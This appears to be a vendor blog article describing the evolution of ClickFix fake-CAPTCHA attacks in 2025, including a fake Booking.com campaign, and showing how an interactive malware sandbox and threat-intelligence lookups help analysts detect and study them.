Do Son 
Sandbox malware detonation of a ClickFix attack with a fake CAPTCHA
“Now, here, you see, it takes all the running you can do, to keep in the same place. If you want to get somewhere else, you must run at least twice as fast as that!”
Lewis Carroll’s Red Queen perfectly encapsulates the current state of cybersecurity. As defenders strengthen their postures, threat actors adapt with equal fervor, creating an endless cycle of innovation and counter-innovation.
In 2025, this dynamic has never been more apparent than in the explosive evolution of ClickFix attacks.
Understanding ClickFix Attacks
What began as a relatively simple social engineering technique transformed into a sophisticated, multi-vector threat that has grown by an astounding 517% in just the first half of 2025 (ESET threat report H1 2025). For malware analysts, understanding this rapidly evolving attack vector is no longer optional: it’s essential for staying ahead in the Red Queen’s race.
ClickFix attacks exploit malicious HTML attachments or websites. The hallmark of the method is a fake βfixβ action: victims are urged to resolve a fabricated error or security problem by clicking a button that supposedly repairs, updates, or verifies something.
Under the hood, these attacks often rely on:
- HTML smuggling: embedding malicious payloads directly inside HTML code.
- Obfuscated JavaScript: scripts that unpack or download the next stage when executed.
- Convincing UI elements: buttons styled to look like legitimate error dialogs or IT prompts.
The danger lies in its simplicity: victims are tricked into believing they are solving a problem, when in fact they are opening the door to compromise. Once the button is clicked, the chain can quickly deliver stealers, RATs, loaders, or even ransomware.
Notable examples include campaigns distributing RedLine Stealer and AsyncRAT, often through emails with seemingly harmless HTML attachments. Traditional email filters and endpoint security tools frequently fail to block these files because the malicious payload is hidden until the user actively interacts with it.
A typical ClickFix attack can be observed on the example of this malware sample analyzed in ANY.RUNβs Interactive Sandbox.
|
Detect ClickFix attacks in seconds and research TTPs in details with Interactive Sandbox |
2025: The Year of ClickFix Evolution
First detected in early 2024, ClickFix attacks initially focused on distributing basic Remote Access Trojans (RATs) like NetSupport RAT. However, the technique’s effectiveness quickly attracted more sophisticated threat actors. The Lampion banking trojan campaign, targeting Portuguese users through fake tax authority websites, demonstrated the technique’s potential for targeted, localized attacks.
More concerning was the adoption of ClickFix by state-sponsored groups, including Kimsuky (TA427), who weaponized the technique in highly targeted campaigns against think tanks and research organizations.
Over the last few months, researchers have observed several new tendencies shaping the evolution of ClickFix campaigns:
Advanced Evasion and Obfuscation
- Multi-stage Infection Chains: Complex delivery mechanisms with multiple obfuscation layers
- Steganography Integration: Hidden payloads within legitimate-looking images and documents
- Living-off-the-Land: Extensive use of legitimate system tools like PowerShell, WMI, and mshta.exe reduces the need for external binaries and helps attackers stay under the radar.
- Anti-Sandbox Techniques: Environmental awareness and sandbox detection capabilities
Cross-Platform Expansion
Originally Windows-focused, ClickFix attacks now target multiple operating systems. Campaigns now successfully compromise Windows, macOS, and even mobile platforms, with attackers developing platform-specific lures and payloads.
Abuse of Trusted Services
Attackers often hide payloads on legitimate platforms such as Google Drive, OneDrive, or Dropbox. Since connections to these domains are rarely blocked, malicious traffic blends seamlessly with normal activity.
Advanced HTML Smuggling
Scripts now use stronger obfuscation, encoding, or encryption to conceal payloads within HTML files. In some cases, payloads only materialize after user interaction, delaying detection even further.
Localized and Industry-Specific Lures
Campaigns are increasingly tailored by geography. For example, fake βsystem errorβ dialogs may appear in the local language, making the attack more believable. Attackers are developing sector-specific campaigns: fake medical system errors and compliance notifications for healthcare, false security alerts and system maintenance notifications for government units, and such.
MFA and Account Security Themes
Some ClickFix variants imitate multi-factor authentication issues, showing messages such as βYour 2FA is broken, click here to fix.β This not only delivers malware but also harvests credentials.
Taken together, these trends point toward a clear trajectory: stealth, evasion, and trust exploitation. The core mechanic (pressuring a user into clicking) remains unchanged, but the infrastructure supporting it grows more sophisticated.
Leveraging ANY.RUN’s Interactive Sandbox for ClickFix Detection and Analysis
ANY.RUN’s Interactive Sandbox provides unparalleled capabilities for analyzing ClickFix attacks, offering malware analysts the tools necessary to dissect these complex, user-interaction-dependent threats.
For analysts, the biggest challenge is that ClickFix attacks require user interaction to fully reveal themselves. Automated tools may stop short of triggering malicious behavior, leaving defenders blind to real risk.
ANY.RUNβs Sandbox allows analysts to replicate the exact steps a victim would take and safely expose the entire attack chain. Key features include:
Interactive detonation: Analysts can manually click the βFixβ button, watching in real time as the malicious script unpacks itself.
- Network visibility: ANY.RUN automatically logs all outbound connections, whether to cloud storage services, command-and-control servers, or staging domains.
- IOC extraction: URLs, IP addresses, file hashes, and registry changes are collected automatically, ready for immediate integration into detection rules or threat intelligence feeds.
- Behavioral insights: Instead of a single verdict, users see how the malware behaves step by step which is critical for understanding evasion and persistence techniques. Process monitoring and file system changes included.
- Memory Analysis Capabilities: ClickFix campaigns often employ in-memory execution and steganography techniques. ANY.RUN’s memory analysis features enable detection of hidden payloads in memory, fileless malware execution analysis, and identification of process hollowing and injection techniques.
- Steganography Detection: the Sandbox supports the analysis of embedded content from seemingly legitimate files. An analyst can identify unusual file entropy patterns and monitor for unexpected decode operations.
- Anti-Anti-Evasion Analysis: the Sandbox combats evasion techniques by adjusting VM environments to bypass environmental checks. It supports the analysis of time-based delays and user interaction requirements and lets identify and circumvent geolocation-based restrictions.
- Collaboration and sharing: Findings can be easily shared across teams and organizations, accelerating collective defense.
Regarding ClickFix, this means analysts can quickly determine not just what malware was delivered, but how it was delivered, and which indicators point to ongoing campaigns.
Detecting ClickFix with ANY.RUN Interactive Sandbox: New Wave Attack Use Case
The summer of 2025’s vacation season brought along a fake bookings ClickFix campaign. Forged Booking.com emails typically requested payment confirmation or additional service fees, urging victims to interact with malicious payloads.
ANY.RUNβs analysts observed a number of attacks featuring fake payments analyzed by the users of Interactive Sandbox. View one of the detonations.
A quick search in Threat Intelligence Lookup reveals a clear spike in activity during May-June. Use this search request to find related domains, IPs, and sandbox analysis sessions:
domainName:”booking.” AND threatLevel:”malicious”
The most recent samples feature ClickFix, a scenario with a fake CAPTCHA where the victim is tricked into copy-pasting and running a PowerShell downloader via terminal.
The downloaded executables here belong to the RAT malware families, giving attackers full remote access to infected systems.
To find more malware samples utilized in pseudo-Booking attacks, search TI Lookup for malicious domains that fake hotel booking confirmations:
domainName:”book*conf” and threatLevel:”malicious”
Such lookups also help collect additional IOC:
Whatβs Next?
We expect ClickFix to evolve along several axes:
- AI-generated, dynamic lures: Messages and prompts that can be personalized, adapt in real time, mimicking user context and language fluently.
- Wider SaaS abuse: More hosting on collaborative platforms and CDNs that defenders are reluctant to block.
- Supply chain integration: Software update mimicry, third-party service abuse, browser extension compromise.
- Cross-platform and mobile targeting: Expanding to macOS, iOS and Linux via browser-based vectors or platform-specific commands; Android expansion.
- Automated obfuscation: Payloads re-scrambled per delivery, reducing signature-based detection efficacy.
- Threat actor ecosystem development: ClickFix-as-a-Service; niche actor expertise developing along with cross-group collaboration (sharing of techniques between different threat actor groups).
Such evolution narrows the gap defenders have on attackers β making proactive tools and tactics all the more essential.
Strategic Considerations
The evolution of ClickFix attacks illustrates the critical importance of maintaining adaptive security postures. As threat actors continue to innovate, security teams must embrace continuous learning and technology advancement. Interactive sandbox environments like ANY.RUN fuel this adaptive approach, providing the detailed behavioral analysis capabilities necessary to understand and counter sophisticated social engineering attacks.
ClickFix attacks succeed not because of technical sophistication alone, but because they effectively exploit the intersection of technology and human psychology: a challenge that requires both technical excellence and deep behavioral insight to address effectively.
The stakes are high, but the tools and knowledge necessary for success are within reach for those willing to run twice as fast as the threats they face.